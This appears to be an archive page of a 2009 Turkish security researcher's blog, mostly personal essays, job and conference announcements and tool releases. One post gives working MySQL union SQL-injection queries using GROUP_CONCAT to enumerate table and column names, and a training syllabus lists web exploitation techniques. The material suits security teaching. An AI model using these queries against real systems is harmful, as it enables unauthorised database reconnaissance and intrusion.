En Son yazılar - Ferruh Mavituna

Otomasyon, otomasyon, otomasyon...

Ferruh Mavituna — Per, 25 Haz 2009 10:44:41 +0300

Sık söylediğim laflardan biri şudur : "If you can automate it, automate it". DRY (kendini tekrarlamamak/do not repeat yourself) sadece kod yazma sırasında değil bence hayatın her noktasında önemli bir şey. Özetle eğer bir şeyi otomatiğe bağlama şansın varsa hemen şimdi bunu yap. İlk internet sitemi yayınladığımda hayat çok farklıydı siteyi en ufak bir değişiklik için FTP ile her seferinde güncellemek ve tek kişilik CMS sistemi olmak rezil bir deneyimdi. İlk blog sistemimi yazdığımda da bazı şeyler fark ettim blog yazmaya başlamam ne kadar çetrefilli ise o kadar az blog yazıyordum, yani sistemin kendi limitleri veya gereksinimleri blog yazmamı engelliyordu.

Bu sadece teknik veya vakit ile ilgili bir sorun değil bu psikolojik bir sorun. İnsan doğası sıkıcı işleri sevmiyor ve rutin işler insana sıkıcı geliyor. Bir geliştirici olarak kendinizi bir rutin içerisinde bulursanız gidişatta bir hata var demektir. Belki Ruby On Rails' ın çıkışı veya binlerce framework' ün tetikleyicisi de budur.

Yazılım geliştirirken gerekli otomasyonu yapıyor musunuz?

Veritabanında değişiklik yaptıktan sonra ORM' de kodların belirmesi için kaç tuşa basman gerekli?
Yazılıma yeni bir eklenti eklendiğinde Unit Test' ler otomatik olarak çalışıyor mu?
Aynı kodu tekrar ve tekrar yazıyor musun?
Koddaki değişiklikten yazılım paketinin internette yayınlanması arasında kaç tane manuel işlem var?

Daha önceden büyük resmi görebilmek ile ilgili bir yazı yazmıştım, yazılım geliştirirken ve başka işler yaparken de büyük resmi görebilmek lazım.

Sisteminizde otomatiğe bağlayabileceğiniz şeylerin listesini çıkartın
Listedeki her başlık için "Otomatiğe bağlamak ne kadar sürer?", "Otomatik olmadığında hata oranı nedir?", "Bu işlemin ne kadar sıklıkla yapılması gerekiyor?" sorularını kendinize sorun ve cevaplarını düşünün. Otomasyona harcayacağınız vakit kendini 1 haftada amorti ediyor olabilir ya da hata çıkma oranından dolayı potansiyel bir hata da otomasyona harcayacağınız vakit kadar hatayı düzeltmeye ya da tespit etmeye vakit harcayacak olabilirsiniz.

Eğer programcı değilseniz hala hayatınızda otomatiğe bağlayabileceğiniz şeyler var:

Faturalarınızı, kiranızı vs. otomatik olarak ödeyin
İnternette okuduğunuz yazılara siz gitmeyin RSS okuyucu kullanın onları size gelsin
Bilgisayarınızdaki rutin işlemleri otomatiğe bağlayın

Bunların hepsini otomatiğe bağladıktan sonra, para kazanmayı da otomatiğe bağlayınca Kuala Lumpur' da sahilde uzanıp otomatiğe bağladığınız her şeyi unutabilir ve belki de hayatın tadını çıkartabilirsiniz…

Abaküs

Ferruh Mavituna — Sal, 23 Haz 2009 11:52:59 +0300

İstanbul' dan döndüm ancak yoğunluk, konferans vs. derken siteye bir şey de yazamadım.

Türkiye' ye gidişimin birçok nedeni vardı;

Genel olarak İstanbul ziyaretim keyifli ve verimli geçti. Program ZTV' de yayınlandı, şuradan izleyebilirsiniz. Abaküs programının yapımcısı ve sunucusu Ziyahan Albeniz' de tekrar teşekkür ederim, kendisi ile programdan önce ve sonra çok keyifli sohbetler ettik. Birkaç gün ara ile diğer konular hakkında da yazacağım, bu arada blog' da çok yazmıyorsun diye sızlananlar FriendFeed üzerinden de beni takip edebilir.

İstanbul Semalarında...

Ferruh Mavituna — Çar, 03 Haz 2009 17:35:04 +0300

Yarın bir süreliğine Web Uygulaması Güvenliği Eğitimi, IstSec Konferansı ve başka bir dizi iş için İstanbul' a gidiyorum, sıcak hava ve Marmara' nın tadını da çıkartaya çalışacağım. Bu sırada pek yazamayacağım ve acil olmadıkça, e-mail' larımı cevaplamayacağım. İlgililere duyurulur.

.NET Yazılım Geliştirme Uzmanı

Ferruh Mavituna — Pzt, 01 Haz 2009 12:22:30 +0300

Benim ile birlikte çalışacak .NET Yazılım Geliştirme Uzmanı aranıyor. Eğer benim tanıdığım birini tanıyorsanız referans olarak o kişinin ismini ve iletişim bilgilerini vermeyi unutmayın.

İngiltere' de ki bir güvenlik startup' ının Türkiye ofisinde (ve/veya home office' den) çalışacak ve yeni bir yazılımın geliştirilmesinde önemli rol oynayacak. NET yazılım uzmanı aranmaktadır. Firma bilgisi henüz startup aşamasında olduğundan gizlidir. İlgilendiğimiz adaylara ilk görüşmede bu detaylar verilecektir.

Gereksinimler
• .NET ve OOP konusunda en az 2 yıl deneyim,
• VB.NET kodu yazabilen, C# kodu okuyabilen
• Takım Çalışmasında başarılı ve Uzaktan Çalışabilecek
• Winforms, Unit Testing konusunda deneyimli
• İyi seviyede teknik İngilizce (okuma)

Tercih sebebi olacak ekstralar
• Web uygulaması güvenliği bilgisi
• Web uygulaması geliştirme deneyimi
• İyi derecede RegEx bilgisi
• İyi derecede İngilizce konuşma – yazma – okuma
• İyi derecede Visual Basic 8.0 +

İş Detayları
• Yeni bir yazılımın geliştirilmesinde kilit rol oynayacaksınız
• Maaş deneyime göre belirlenecek ve Sterlin (pound) olarak ödenecektir
• Esas olarak full-Time biri aranmasına rağmen part-time pozisyonda bulunmaktadır. Eğer part-time çalışmak istiyorsanız bunu başvurunuzda belirtiniz.

CV lerinizi ferruh(at)mavituna.com a gönderiniz. Konu başlığında "DEV-WG [ISIM SOYAD]" şeklinde yazınız. Başvurunuza en iyi kodlarınızdan biri olduğuna inandığınız bir VB.NET kodunu (öncelikli) veya C# kodunu eklemeniz gereklidir.
Kod göndermek yerine. NET ile geliştirdiğiniz bir open source yazılım varsa ilgili adresi de gönderebilirsiniz.

CV' ler ve ilgili tüm yazışmalar hiçbir 3. şahıs ile bilginiz dışında paylaşılmayacaktır. En geç 1 Ağustos' ta işe başlayabiliyor olmanız gereklidir.

FSF – Freakin’ Simple Fuzzer

Ferruh Mavituna — Cum, 29 May 2009 18:14:06 +0300

I've released my simple web application fuzzer and data scraper, FSF. It works under OSX, Windows, Linux. Hosted on Google Project, report bugs, write plug-ins, have fun.

IstSec – İstanbul Güvenlik Konferansı

Ferruh Mavituna — Cum, 29 May 2009 14:53:23 +0300

10 Haziran' da IstSec – İstanbul Güvenlik Konferansında konuşuyor olacağım. Türkiye de güvenlik konusunda bu çaptaki organizasyon sayısı çok az, o yüzden sakın kaçırmayın. Konferans ücretsizdir ve 10 Haziran ( Çarşamba ) 2009 da Levent' teki Microsoft Türkiye Ofisi' nde gerçekleşecektir. Hemen kayıt olun, yerinizi ayırtın.

Açıkçası ben konferansın çok keyifli geçeceğini umuyorum. Bu arada bir CTF (capture the flag) var, ona da kaydolmayı unutmayın. Organizasyonu yapanlara da emeklerinden dolayı teşekkürleri borç biliriz.

Konuşma Hakkı – Sertifikasyon

Ferruh Mavituna — Çar, 13 May 2009 18:49:22 +0300

Birinci yazı çok tutu diye ikincisini çekmedim! Bu daha çok birinci yazının ahengine kendime kaptırıp unuttuğum kısımları tamamlamaya çalışan bir yazı. Konuşma Hakkı henüz okumadıysanız on okuyup bu yazıya geri dönmeniz mantıklı olacaktır.

Hayat girdi ve çıktıdan ibaret, Konuşma Hakkı yazısını da yazmamın ana nedeni benim bilişim sektörü ve üniversite konularında konuşmaktan çekinmemdi. Ben üniversiteye gitmediğinden işin tek yönünü biliyorum, dolayısıyla biri bana "Ne dersin? 4 sene X' i mi okuyayım yoksa Y işyerinde çalışmaya devam edip sektörde deneyim mi kazanayım?" dediğinde benim bu kişiye vereceğim tek yönlü bir cevap var: "Ben gitmedim, halimden memnunum, gitseydim daha iyi olur muydum, bilemiyorum…"

Aynı şey sertifikasyon için de geçerli, benim hiç sertifikam yoktu ve o konuda konuşmuyordum, ama 2008' in sonunda "Application Security" konusunda ileri seviye bir sertifika olan CREST' i aldım. CREST bu konuda su götürmez şekilde alınması en zor sertifika, sınav tüm gün sürüyor, pratik + yazılı + çoklu seçim şeklinde gerçekleşiyor ve gerçekten de zor bir sınav. Artık bir sertifikam var dolayısıyla sertifika konusunda konuşabilirim¹

Gel gör ki 5.000 TL sınav ücreti ödeyip 3 seneliğine bu sertifikayı almış biri olarak hayatımda hiçbir değişiklik olmadı. Olmasını da beklemiyordum.

Sertifika almanın birkaç nedeni vardır:

Almak zorundasınızdır, çünkü yaptığınız iş sertifika veya akreditasyon gerektirir
CV' nize koyarsınız iş bulmanıza yardım eder
İsminizin önüne, arkasına sağına soluna koyup hava basarsınız(!)²

Şimdi sanıyorum ki en popüler neden 2. neden. Bir çok noktada gayet geçerli bir neden. Mesela şu an bu sertifika bana bir sonraki işimde çok yardımcı olabilir ama zaten iyi olan her IT uzmanı çok seçici değilse 1 haftada iş bulur. Daha önceden de çok söyledim iş bulamıyorsanız suçu sektöre atmayın³. Özetle zaten iyi adamın iş bulması için sertifikaya ihtiyacı yok. Benim alma nedenim biraz farklıydı, bana firmadan alsana dediler ben de gittim aldım. Şimdi de çekmecem de kendi zarfının içerisinde duruyor.

Sanırım sertifikanın en iyi kullanımı bir konuda orta seviyedeyseniz CV' nize birkaç sertifika ekleyip daha rahat iş bulabilirsiniz. Şimdi bir çok kişi bana kızacaktır, onların yorumlarını da bekliyorum belki de tüm bu sertifika muhabbetinde benim bilmediğim başka işler de vardır.

¹ Üniversite konusunda konuşabilmek için 4 sene okul okumak planlarım arasında değil.

²Ben birinin isminde bu şekilde bir unvan gördüğümde akılma gelen tek şey "Demek ki kendi isminin bir önemi yokbu şekilde desteklemesi" gerekiyor diye düşünüyorum

³Junior, stajyer vs. işleri hariç. Herkesin bir yerlerden yetişmesi gerekiyor ama maalesef kriz zamanlarında sadece deneyimli uzmanlar basitçe iş bulabiliyor.

Konuşma Hakkı

Ferruh Mavituna — Çar, 13 May 2009 14:20:28 +0300

Türkçe' de harika deyimler ve atasözleri var⁵

"Kelin merhemi olsa kendine sürer"
"Ağzı olan konuşuyor" gibi…

Özellikle köşe başındaki bakkal amcanın "Bir Bakkalın Deneyimleri – There is no spoon²" isimli bir blog açtığı şu Web 3.0-5.0-2.0 günlerinde kimin bir şeyler yazmaya, bir konu hakkında konuşmaya hakkı olduğunu incelemek gerekli.

"Konuşma Hakkı" derken bilmeyen konuşmasın gibi anlaşılmasın. Bilgi seviyesinden bağımsız "Konuşmak","Yazmak","Paylaşmak" güzel ve faydalı şeyler. Her şeyden önce insanların zaten bir "içini dökme" ihtiyacı var, genelde sevgili ev hanımları gibi hemen yan kapıdaki web startup' ına kahve içip komşunun AJAX kullanmasını çekiştirmeye¹ gidemeyeceğimize göre biz de blog yazıyor, FriendFeed' de sağa sola laf atıyor, e-mail ile dedikodu yapıyoruz. Benim değinmek istediğim bu konu değil.

Öncellikle 3 paragraf yazıp hala bahsedeceğim konuya giriş yapamamış olduğumdan dolayı kendimi tebrik ediyor ve konuşacağım konuya giriş yapıyorum.

Mesela "zengin olmak istiyoruz" gittik Amazon' da kitap arıyoruz.

3 tane kitap bulduk:

Learn to become rich in 21 days, 2nd edition
How to become rich for dummies
Hashhash – Be a Professional assassin in a year

Bu kitaplardan hangisinin daha iyi olduğunu anlamak çok kolay, tüm yazarlara bakarız hangisi bu kitaptan önce zenginse o kişinin bu konuda bir kitap yazma ehliyeti olduğuna karar veririz. Eğer bir kişi nasıl zengin olunacağını anlatıyorsa ama kendisi zengin değilse bu denklemde bir hata var demektir³.

Özetlersek:

"Biri size bir şey anlatıyorsa, o kişinin anlattığı konuda otorite olmasa bile iyi seviyede biri olması gereklidir". Eğer birisi bana gelip ben harika SEO yaparım diyorsa o kişinin sitesinin Google' da ilgili aramalarda yukarıda olmasını beklerim.

En azından teorik olarak durum bu şekilde ama hayat ortadan beyaz boya ile ayrılmış iki yollu bir şerit değil. Bazen henüz adını sanını duymadığınız bir kişi bir konu hakkında inanılmaz bir fikir ile gelebilir, kişiler aslında yazdıkları konuda çok ileri seviyede olsalar da yayında bir şeyleri yoktur, gelecekte o konuda süper bireyler olacaklardır ve bunun ilk kıvılcımlarını gösteriyorlardır.

Blog okurken özellikle uzman olmadığınız konularda⁴ bu istisnalara düşme şansınız kaçtır tartışılır, makale, blog ve fikirle dolup taşan bu sanal ortamda değerli vaktinizi bu istisnalara ayırmanın yatırım olarak getirisi de tartışılır.

Haklı olarak ironiyi fark edip "Ferruh sen bu konuda yazmışsın ama senin bu konudaki otoriten nedir?" diyeceksiniz ben de size "Ben lafımı ortaya korum, beğenen alır, beğenmeyen Alt + F4 yapar" diyeceğim. Bir de işte bu tip yazılar var, yazar kendi beynindeki kişisel fırtınayı blog aracılığı ile yazıya döker ve ondan sonra diğerlerinin düşünceleri ile bir sonuca ulaşmaya çalışır.

¹Güvenlik sektöründe genelde piyasada tanınan, herkesin bildiği ama aslında kazma olan kişiler çekiştirilir, racon budur. Ek olarak abartılmış açıklar ya da aynı konuşma ile 10 güvenlik konferansına gidenler de bu arada kaynar.

²Niye üç blogun iki tanesinin adında "There is no spoon" geçer hiç bilmiyorum. Bu sanırım MMORPG larda karakter isimlerden "Dark" kullanmak gibi bir şey olsa.

³Eğer yazarlardan biri kitap sayesinde zengin olduysa aynı yazarın marketing kategorisindeki "How to sell every single shit in the earth" kitabını almanızı tavsiye ederim.

⁴Eğer o konuda uzmansanız ne okuduğunuz önemli değil. İlk defa duymuş olsanız bile okuduğunuzun fikrin iyi, süper veya saçma olduğunu anlayabilirsiniz.

⁵Türk dilisi ve edebiyası derslerinde "deyimler" konusunda uyuya kaşdığımdan hangisinin deyim, hangisinin atasözü olduğunu çözemedim. Ama eminim ki yardımsever(!) bir TDK şövalyesi önce ayrı yazmadığım "de" ve "da" lar için beni sorguya çekecek sonra da bu gizemli konuya bir açıklık getirecektir.

Web Uygulaması Güvenliği Eğitimleri

Ferruh Mavituna — Çar, 29 Nis 2009 14:05:48 +0300

Güncelleme:
6-7 Haziran eğitim tamamlandı. Yeni eğitimler 29-30 Ağustos' da verilecektir. Zerumax' ın sitesinden bu eğitime kayıt olabilirsiniz, ilginiz için teşekküler. Eğitimin detaylarını yazının devamında görebilirsiniz.

29-30 Ağustos günleri "Web Uygulaması Güvenliği Eğitimi" vermek için Türkiye' ye geleceğim. 2 günlük eğitimde birçok güvenlik açığının nasıl exploit edileceğini gösterecek ve öğreteceğim. Eğitimler aktif şekilde yapılacak ve katılımcılar da kurulacak test sistemlerini gösterilen teknikler ile bizzat hackleyebilecekler.

Eğitim seviyesi başlangıçtan – orta düzeye kadar olacak. Katılımcıların en azından "HTML Nedir?" gibi temel bilgileri bilmesi gerekli ama ön bir güvenlik bilgisine ihtiyaçları yok.

Eğitim İçeriği

Web Güvenliğine Hızlı Bir Giriş
1. Web aslında nasıl çalışıyor?
Web Uygulamaları ve Oturumlari (Session) anlama
1. Üye Giriş sistemleri, Cookieler ve Oturumlar
2. Session Hijacking (Basit bir şekilde oturum çalma)
Basit numaralar: E-ticaret sistemlerindeki sepetleri hackleme
1. Client-side korumaları geçme
2. E-ticaret sitelerinde klasik güvenlik açıklarını exploit etme
XSS - Cross-site Scripting i anlama ve exploit etme
1. XSS Nedir? Nasıl kullanılır, XSS ile ne yapılabilir ne yapılamaz?
SQL Injection ı anlama ve exploit etme
1. SQL Injection nedir?
2. SQL Injection üzerinden sistemi ele geçirme
3. Blind SQL Injection ve Time Based SQL Injection Saldırıları
Hedef Sistemde Kod Çalıştırma (Command Injection, RFI, LFI)
1. RFI (Remote File Injection) açıklarını kullanma
2. LFI (Local File Injection) ile kod Çalıştırma
Upload Formlarını kullanarak sistemi ele geçirme
1. Upload formlarındaki güvenlik önlemlerini geçme
CSRF
1. Cross-site Request Forgery Nedir?
2. CSRF kullanarak sisteme erişim
3. CRSF ve SQL Injection ı kullanarak sistemde kod çalıştırma

Özellikle web sitelerinin güvenliğinden sorumlu olan kişiler, güvenli kod yazmak isteyenler, hackerların sistemlere nasıl saldırdığını öğrenmek ve o şekilde kendi sistemlerine saldırmak isteyenler için eğitimin çok verimli olacağını düşünüyorum.

Kayıtlar Başladı

Eğitim Zerumax tarafından organize ediliyor, Zerumax' ın sitesinden eğitime kayıt olabilirsiniz, eğitim sonunda katılımcılara eğitim sertifikası verilecektir. Ek olarak eğitim yeri Taksim Oteller Bölgesi olacak ve çay – kahve, öğle yemeği fiyata dahildir.
2 günlük eğitimin toplam fiyatı 750 YTL + KDV' dir.

Eğitim konusunda herhangi bir sorun ya da sorunuz olursa yorumlara yazabilir ya da ferruh(at)mavituna.com adresinden e-mail ile ulaşabilir ya da Zerumax ile direk olarak görüşebilirsiniz.

Psycho Folder

Ferruh Mavituna — Paz, 26 Nis 2009 21:31:25 +0300

I've got a routine of extracting downloaded video files, appending subtitles where required and moving them to the server that my PS3 connects, so I can watch it on my TV. This process involves about 3 steps, 1-2 minutes waiting, worse I have to be in front of the computer (second floor) to do these.

This weekend I decided to put an end to my misery and developed a small application which watches a folder and carries out defined rules based on the created/renamed files in the folder. After about 2-3 hours of hacking I end up with Psycho Folder. Just modify the Rules.xml, define your own rules and let it do the job for you. After I saw it on action and really liked it and spent another couple of hours for polishing.

It's written .NET Framework 2.0, get the source code or get the installer to give it a try. Report a bug or request a feature.

ITUnderground 2009’ un Ardından

Ferruh Mavituna — Paz, 29 Mar 2009 13:59:11 +0300

Konferanstan döneli bir kaç gün oldu. Konferansta gayet güzel sunumlar vardı. Benim çok aktif olmadığım bir konu olan Layer 2 güvenliği ile ilgili üç güzel sunum izledim. Pek ilgim olmadığından dolayı bir tanesi gayet bilinir bir konu olsa da gene de ben eğlendim. DTP, STP protokollerini kurcalama ve genel Vlan saldırıları ile ilgiliydi. Demoların bir çoğu güzeldi ve biraz daha derin bilgi almak keyifliydi.

Alexander Kornbrust' ın ORACLE SQL Injection prezentasyonu süperdi. Kesinlikle BSQL Hacker' a ORACLE ile ilgili template ve SQL Injection tespit güncellemesi yapacağım. Yılda ancak 2-3 ORACLE testi yaptığımdan o kısımda biraz paslıydım, bu sunum ve sunumdan sonra kendisi ile ettiğimiz muhabbetten sonra ORACLE' ın için kendimi hazır hissediyorum. Sunumun başları çok temel olduğundan ilk 30dk. sını atladım diyebilirim, ama ilk yarıdan sonrası harikaydı. Yeni bir şey yok ama konuyu en iyi şekilde aktarmayı başardı.

Ben One Click Ownage isimli bir sunum yaptım. Temel olarak bir tıkla SQL Server' dan reverse shell alma ya da benzer bir kod çalıştırmayı gösterdim. Bu önceden CSRF saldırıları ile SQL Server' ı exploit etme olanağı da sağlıyor. Her ne kadar bu nadir bir durum olsa da daha önceden bu tip bir şey mümkün olarak gözükmüyordu ve bu yöntem ile artık yapılabilir. Ek olara otomasyonuda çok kolay olan bir saldırı. Ben bir süredir kendi testlerimde kullanıyorum ve TFT/FTP vs. gibi aksiyonlara girmeden 20 sn. içerisinde reverse shell' e düşmek gerçekten keyifli bir durum.

Kendi sunumum ile ilgili kod, script ve uygulamaları yakında yayınlayacağım.

IT Underground – Prague 2009

Ferruh Mavituna — Per, 19 Mar 2009 20:15:14 +0300

IT Underground Prague 2009' da bu salı günü (24 Mart) "One Click Ownage" isimli bir sunum yapıyor olacağım inşallah. Konferanstan dönünce bu sunum yapcağım konuda da bir blog yazmayı düşünüyorum.

Bir Mim, Bir Kitap, Bir Hayat

Ferruh Mavituna — Cum, 13 Mar 2009 09:59:38 +0300

Bu aralar blog performansım çok kötü ama bunun güzel nedenleri var. Yeni projeler peşindeyim, uzun süredir ertelediğim işleri canlandırma peşindeyim, o yüzden RSS okuyucunuzun ayarları ile oynamayın...

Bir Mim

Onur, Kitap Yazsaydım Ne Üzerine olurdu? diye sormuş, sonradan topu atıp kaçmış. Aslında her zaman gerçek ya da gerçek olabilecek teknikler kullanan bir grup hacker' ın kurgusal maceralarını yazmak istemiştimdir ama vakit ve kabiliyetsizlik gibi nedenlerden dolayı bir türlü fırsatım olmadı. How to Own The Box ama daha iyi kurgu ya da Dan Brown' un Deception Point' i ama daha iyi teknik gibi.

Mim' i yorum yapanlara paslıyorum, ilginizi çekiyorsa hemen sitenizde devam edin yorumlara da adresinizi yazın, biz de okuyalım.

Bir Kitap

Sevgili eşim bana The 80/20 Principle: The Secret of Achieving More with Less' ı almış. Onu okumaya başladım, Pareto Prensibi zaten bildiğim çok uzun zamandır da yer yer uygulamaya çalıştığım şeylerden biri ancak kitap olayı çok daha derin ve kanıtlarla, gerçek örnekler ile ortaya koyuyor ki, gerçekten etkileyici.

Equality ends in dominance

gibi direk damardan girdiği ve insanı derin düşüncelere sevkettiği bir çok yer var.

Bir Hayat

Evli insanlar için hiçbir zaman bir hayat yoktur, "iki hayat" desek dağa doğru olacak. Bu aralar her zamanki gibi hayatımda değişiklikler yapmaya çalışıyorum. Taşınmak, işimi değerlendirmek, projeleri hayata geçirmek vs. gibi şeylerle uğraşıyorum. Eşim' de Homeshowroom ' da "Evin Delisi" köşesinde yazmaya başladı, onu da buradan tebrik etmek istedim :)*

* Sanırım bir blog yazısında ilk defa smile kullandım, çok heyecanlıyım

Doğu Akdeniz Üniversitesi Bilişim Haftası

Ferruh Mavituna — Sal, 10 Mar 2009 20:43:35 +0300

Şimdi bu etkinliği son anda iptal edildiğinin haberini aldım, dolayısıyla Bu Pazartesi Kıbrısta olmayacağım. Yok ille de senin bir konferansına geleceğim diyen varsa bu ayın sonundaki IT Underground' a beklerim.

GROUP_CONCAT MySQL SQL Injection

Ferruh Mavituna — Pzt, 02 Mar 2009 20:07:29 +0300

Apparently GROUP_CONCAT() is already known by many people, except me! I've just found it. It allows to get multiple rows as a string. This makes it a perfect candidate for one-row union SQL Injections. There is one catch though, by default it returns only 1024 characters (global option, can't be set via an SQL Injection) which is not enough for one query sql-dump sorts of tricks.

However this simple query can be useful for enumerating tables and columns together in fewer requests:

SELECT CONCAT(table_name,'>',GROUP_CONCAT(column_name)) FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1
SELECT CONCAT(table_name,'>',GROUP_CONCAT(column_name)) FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 2,1
SELECT CONCAT(table_name,'>',GROUP_CONCAT(column_name)) FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 3,1
SELECT CONCAT(table_name,'>',GROUP_CONCAT(column_name)) FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT n,1

Output will be look like:

'db>Host,Db,User,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Grant_priv'
'help_category>help_category_id,name,parent_category_id,url'
'help_keyword>help_keyword_id,name'

Damn! I should update SQL Injection Cheat Sheet and SQL Injection Wiki , lots to catch up...

Yazılım Geliştirmenin İki Yolu

Ferruh Mavituna — Pzt, 02 Mar 2009 09:42:58 +0300

Diyelim ki bir uygulama için raporlama fonksiyonu geliştiriyorsunuz. Bu raporların CVS ve HTML formatını desteklemeleri gerekiyor. Bu durumda iki seçeneğiniz var:

İki fonksiyon yazmak
- Rapor datasını alıp CSV çıktı üreten bir fonksiyon,
- Rapor datasını alıp HTML çıktı üreten bir fonksiyon.
Bir raporlama sistemi yazmak;
- CSV ve HTML için iki şablon tasarlanır,
- Raporlama sistemine Rapor Datası verilir,
- Raporlama sistemine Rapor Şablonu verilir,
- Raporlama sistemi bu iki bilgiyi birleştirip raporları oluşturur,
- Bu altyapı kullanıcıdan gizlenir içeride kullanılır. Gerekirse gelişmiş kullanıcılarda bu rapor sistemini kullanarak daha sonradan yeni rapor tipleri üretebilirler. Mesela XML rapor alabilirler.

Birinci yolun avantajları ve dezavantajları:

Hızlı bir şekilde sonuca ulaşmak, kodun çok daha basit olması.

İkinci Yolun Avantajları

Prezantasyon ile datanın temiz şekilde ayrılmış olması,
Daha sonradan yeni bir rapor formatı gerektiğinde tekrar kod yazmaya gerek olmaması,
Daha sonradan bu fonksiyonun kullanıcılara açılabilmesi.

Şimdi geniş ölçekte farklı yolları seçen yazılımları görelim:

Internet Explorer
Birinci yolu seçen yazılımlardan.
Firefox
İkinci yolu seçen yazılımlardan. Firefox bir onlarca fonksiyonu XUL Framework' ü üzerine inşa etti. Dolayısla aynı raporlama sistemi gibi XUL sistemini yazdılar. Daha sonradan geniş bir API ile onu desteklediler ve aynı herhangi biri Firefox için eklenti (addon) yazarmış gibi Firefox' un iç sistemini geliştirdiler. Daha sonrada bunu kullanıcıya açtılar. Açılan API çok güçlüydü çünkü geliştiriler XUL ile bir şeyler geliştirirken API yüzünden tıkandıklarında API' ı geliştirdiler dolayısıyla tüm sistem çok daha güçlü bir hal aldı.

Benzer örneklerden gidersek Macromedia' nın hemen hemen tüm ürünleri de aynı şekilde geliştirilmiştir. Ana motor JavaScript + Macromedia' nın güçlü API larını destekler. Aynı XUL gibi JavaScript ve bu API' lar birleştirilerek extension' lar yazılabilir. Eğer Dreamweaver, Flash gibi yazılımların altyapılarını incelerseniz ana sistemden sonraki hemen hemen tüm yazılımın JavaScript ile yazılmış olduğunu görebilirsiniz. Yani bu kodları değiştirerek aslında tüm yazılım arabirimlerine kadar değiştirebilir ya da yeni fonksiyonalite ekleyebilirsiniz.

Burada bence unutulmaması gereken şey geliştirilen yazılımın boyutudur. Yani Macromedia ya da Firefox bu tip bir framework' ü destekleyebilir ama küçük bir takım için bu seçim büyük bir yanlış olabilir. Ama raporlama sistemi küçük olduğundan tek kişi olarak çalışan bir geliştirici bile raporlama sistemini özel bir çözüm yerine bu şekilde genel bir çözüm olarak geliştirebilir.

Benim naçizane fikrim iyi programcılar her zaman ikinci genel çözümü yapmak ister, ancak hayatın gerçekleri işin yönünü değiştirebilir.

Sakin

Ferruh Mavituna — Cmt, 28 Şub 2009 12:02:08 +0300

Emre Yılmaz "Genç Bir İşadamına" kitabında bir koltukta oturup hiç bir şey yapmadan durmanın ne kadar zor olduğunu anlatır. Bu kitabı altı sene kadar önce okudum ama sanırım ne demek istediğini yeni anladım.

Lise hazırlıktayken çok sıkı bir Fallout oyuncusuydum ve hafta sonu rutinim şu şekildeydi:

Saat 7:30 sularında uyanılır,
Bilgisayar başına geçilir,
Tuvalet ve Yemek molaları hariç tüm vakitte Fallout oynanır.

Hayatımı sanal bir dünyada yemiş, bitirmiş olmaktan gurur duyduğumu söyleyemem ama açıkçası yaşadığım dertsiz, tasasız kendini tamamen başka bir dünyaya kaptırmanın verdiği o keyfi hayatımda bir daha yakalayabileceğimi sanmıyorum. Gene altı sene kadar önce sıcak bir yaz gecesinde Marmara manzaralı balkonumun kenarına kurduğum bilgisayarımda, müzik dinleyip chat yaparken "Daha ne isteyebilirim ki?" dediğimi hatırlıyorum, bu da tekrar zor ele geçirilecek anlardan biriydi.

Artık o kadar çok "yapacak şey" var ki, her zaman bir şey yapmam gerekiyor. Derdimin dermanı David Allen değil, onu biliyorum, çünkü her şeyi yapmak özellikle de materyalist değil ruhsal açıdan da yaşayan bir insan için maalesef pek kolay değil. Gazze' dekileri görüp, Afrika' da açlıktan ölen insanları görüp, etrafımızda zorluklarla yaşayan insanları görüp, bir şey yapmamak kolay değil. Kendi rahatlığının "görünürde" verdiği avantajın altından kalkmak kolay değil, sen evde akşam yemeğinde hangi yemeği yesem diye düşünürken arkadaşının "akşam yemeğinde ne bulabilirim?" diye düşündüğünü bilirken sakin ve huzurlu bir hayat yaşamak kolay değil.

Her zaman yapacak bir şeyler:

Yapmadığım dini görevlerimi yerine getirmeye başlamak, yapıyorsam daha iyisini yapmaya çalışmak,
Hafta 2-3 gün çalışarak istediğin şartlar altında yaşamanın yolunu bulmak,
Haftalık çalışma vaktini azaltabilmek için bir proje geliştirmek,
X Projesini yapmak,
Y Projesini geliştirmek,
Z işine girmek,
Q konusunda bilgi sahibi olmak,
Hal - hatır sormak, dostları bulmak,
Aileye daha çok vakit ayırmak vs. vs.

Bu tam anlamıyla sonu olmayan bir liste, işte bu yüzden insan koltuğa yatıp 30 dk. hiç bir şey yapmadan duramıyor, çünkü biliyor ki yapılması gereken bir çok şey var. Bir çok çözüm var, yeni nesil (özellikle avrupadaki, amerikadaki yeni nesil ve Türkiye' de onları taklit eden yeni nesil) gibi hiç bir şeyi takmamak, inanmamak, salmak gitmek. Bunu her bünye kaldırmaz. O kültür ile büyümemiş bünyenin kaldırması daha da zordur, işte bu noktada tekrar iyi ve kötü tarafıyla "Ignorance is bliss" lafı akla geliyor.

Konuyu bağlayacak bir yerde bulamadım, bir nevi iç dökme olarak kabul edin artık.

Güle Güle Twitter ve FriendFeed

Ferruh Mavituna — Sal, 24 Şub 2009 10:39:01 +0300

Nedense ben bu süreçten çok fazla geçiyorum, her şey IRC ile başladı, daha sonra ICQ' ya geçti, sonra MSN, skype oldu vs. Ondan sonra IM olayından tamamen koptum. Bu süreç içerisinde forum kavramı bir dönem hayatımda oldu. Bu basit dönemlerde internette sosyalleşme de basitti.

Daha sonra Facebook ve MySpace gibi delilikler başladı ki Allah' a şükür Orkut' un ilk dönemlerinden dersimi almış olduğumdan onlara hiç bulaşmadan sıyrıldım. İnsanların okul arkadaşları ile, eski dostları ile diyalogunu bu tip bir platform üzerinden sürdürebilmesi her ne kadar kulağa çok güzel gelse de, o kişi okulda arkamdaki sırada otururken bile kendisi ile görüşmediğimden, bugün kendisini bir daha bulup neden görüşmek isteyebileceğimi bilmiyorum! Bu genel bir sorun değil bu benim sorunum, olayı yeterince sosyal ya da hümanist olmadığımı söyleyerek çözümleyebiliriz sanırım. Ya da diyelim ki yapılacaklar listemde on sene önceki arkadaşlarımın bugün hangi sosyal platformda kaç kız arakladığını takip etmek yukarılarda değil.

